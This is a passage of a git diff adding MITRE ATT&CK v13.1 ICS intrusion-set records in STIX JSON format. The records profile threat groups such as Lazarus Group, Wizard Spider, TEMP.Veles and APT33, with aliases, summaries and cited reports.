+ "source_name": "APT34", + "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + }, + { + "source_name": "Unit42 OilRig Playbook 2023", + "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.", + "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json new file mode 100644 index 0000000000000000000000000000000000000000..41c68211922e7f0519807bca615093055416922f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--97f420fa-f87c-4de4-a263-e0cb30d14702", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "id": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0057", + "external_id": "G0057" + } + ], + "modified": "2018-10-17T00:17:13.469Z", + "name": "APT34", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json new file mode 100644 index 0000000000000000000000000000000000000000..db8bc0a0338ad718e356079f8d452e7dc10b27d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json @@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--21b8d210-516c-4cf9-a725-8c65bb30f9af", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Dragonfly 2.0", + "IRON LIBERTY", + "DYMALLOY", + "Berserk Bear" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0074", + "url": "https://attack.mitre.org/groups/G0074" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)" + }, + { + "source_name": "Dragonfly 2.0", + "description": "(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018." + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + }, + { + "source_name": "Secureworks IRON LIBERTY", + "url": "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020." + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "url": "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "description": "Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017." + }, + { + "source_name": "US-CERT TA18-074A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )", + "modified": "2022-05-11T14:00:00.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dragonfly 2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json new file mode 100644 index 0000000000000000000000000000000000000000..1b2d73bd95f0b60be4d63a774f9f5943fdf4e503 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--a0a9261a-9256-47ce-8646-330f765b3baa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:46:40.135Z", + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "created": "2019-04-16T15:14:38.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0088", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + }, + { + "source_name": "FireEye TEMP.Veles 2018", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + }, + { + "source_name": "FireEye TRITON 2019", + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" + }, + { + "source_name": "Pylos Xenotime 2019", + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133.json new file mode 100644 index 0000000000000000000000000000000000000000..a2408e7aca2ace6201976cb96007b7c815377f7b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--d7950267-aecb-4eaf-bbdd-7124d9224bea", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-28T20:49:53.223Z", + "name": "GOLD SOUTHFIELD", + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)", + "aliases": [ + "GOLD SOUTHFIELD", + "Pinchy Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Thijn Bukkems, Amazon" + ], + "type": "intrusion-set", + "id": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "created": "2020-09-22T19:41:27.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0115", + "external_id": "G0115" + }, + { + "source_name": "Pinchy Spider", + "description": "(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "CrowdStrike Evolution of Pinchy Spider July 2021", + "description": "Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.", + "url": "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Secureworks GOLD SOUTHFIELD", + "description": "Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-southfield" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a.json new file mode 100644 index 0000000000000000000000000000000000000000..f5c24084c9bb508fe14ffeef77e83443e7de8bad --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a.json @@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--95f75d2e-8cbf-460b-a3a2-efbf99ef2f7e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T19:01:41.451Z", + "name": "Lazarus Group", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). ", + "aliases": [ + "Lazarus Group", + "Labyrinth Chollima", + "HIDDEN COBRA", + "Guardians of Peace", + "ZINC", + "NICKEL ACADEMY" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.2", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "created": "2017-05-31T21:32:03.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0032", + "external_id": "G0032" + }, + { + "source_name": "Labyrinth Chollima", + "description": "(Citation: CrowdStrike Labyrinth Chollima Feb 2022)" + }, + { + "source_name": "ZINC", + "description": "(Citation: Microsoft ZINC disruption Dec 2017)" + }, + { + "source_name": "Lazarus Group", + "description": "(Citation: Novetta Blockbuster)" + }, + { + "source_name": "NICKEL ACADEMY", + "description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)" + }, + { + "source_name": "Guardians of Peace", + "description": "(Citation: US-CERT HIDDEN COBRA June 2017)" + }, + { + "source_name": "CrowdStrike Labyrinth Chollima Feb 2022", + "description": "CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.", + "url": "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + }, + { + "source_name": "Secureworks NICKEL ACADEMY Dec 2017", + "description": "Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.", + "url": "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" + }, + { + "source_name": "Microsoft ZINC disruption Dec 2017", + "description": "Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.", + "url": "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/" + }, + { + "source_name": "HIDDEN COBRA", + "description": "The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)" + }, + { + "source_name": "Treasury North Korean Cyber Groups September 2019", + "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm774" + }, + { + "source_name": "US-CERT HIDDEN COBRA June 2017", + "description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA \u2013 North Korea\u2019s DDoS Botnet Infrastructure. Retrieved July 13, 2017.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A" + }, + { + "source_name": "US-CERT HOPLIGHT Apr 2019", + "description": "US-CERT. (2019, April 10). MAR-10135536-8 \u2013 North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.", + "url": "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7.json new file mode 100644 index 0000000000000000000000000000000000000000..97985709a41684613ad78f7f08e69193c2a84b06 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7.json @@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--f8b9df8b-ef3a-4341-96e9-45929ffcb62c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:44:27.289Z", + "name": "Wizard Spider", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)", + "aliases": [ + "Wizard Spider", + "UNC1878", + "TEMP.MixMaster", + "Grim Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington", + "Oleksiy Gayda" + ], + "type": "intrusion-set", + "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "created": "2020-05-12T18:15:29.396Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0102", + "external_id": "G0102" + }, + { + "source_name": "Grim Spider", + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)" + }, + { + "source_name": "UNC1878", + "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)" + }, + { + "source_name": "TEMP.MixMaster", + "description": "(Citation: FireEye Ryuk and Trickbot January 2019)" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "CrowdStrike Grim Spider May 2019", + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3.json new file mode 100644 index 0000000000000000000000000000000000000000..a845e1aa4ca52a4ea7e4ac6bea482623a8d1bddf --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3.json @@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--0c1a7584-83ac-42bc-afe5-20c74825315b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:43:59.082Z", + "name": "HEXANE", + "description": "[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)", + "aliases": [ + "HEXANE", + "Lyceum", + "Siamesekitten", + "Spirlin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Mindaugas Gudzis, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1001", + "external_id": "G1001" + }, + { + "source_name": "Spirlin", + "description": "(Citation: Accenture Lyceum Targets November 2021)" + }, + { + "source_name": "Siamesekitten", + "description": "(Citation: ClearSky Siamesekitten August 2021)" + }, + { + "source_name": "Lyceum", + "description": "(Citation: SecureWorks August 2019)" + }, + { + "source_name": "Accenture Lyceum Targets November 2021", + "description": "Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns" + }, + { + "source_name": "ClearSky Siamesekitten August 2021", + "description": "ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By \u201cSiamesekitten\u201d - Lyceum. Retrieved June 6, 2022.", + "url": "https://www.clearskysec.com/siamesekitten/" + }, + { + "source_name": "Dragos Hexane", + "description": "Dragos. (n.d.). Hexane. Retrieved October 27, 2019.", + "url": "https://dragos.com/resource/hexane/" + }, + { + "source_name": "Kaspersky Lyceum October 2021", + "description": "Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.", + "url": "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" + }, + { + "source_name": "SecureWorks August 2019", + "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 ", + "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json new file mode 100644 index 0000000000000000000000000000000000000000..b12f82815f622216b547f91bdacdcc94f12deddd --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--cfa888f4-d07f-4399-9774-9e7bed10e2f9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:07:25.123Z", + "name": "APT33", + "description": "[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "aliases": [ + "APT33", + "HOLMIUM", + "Elfin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0064", + "external_id": "G0064" + }, + { + "source_name": "APT33", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "HOLMIUM", + "description": "(Citation: Microsoft Holmium June 2020)" + }, + { + "source_name": "Elfin", + "description": "(Citation: Symantec Elfin Mar 2019)" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + }, + { + "source_name": "Microsoft Holmium June 2020", + "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.", + "url": 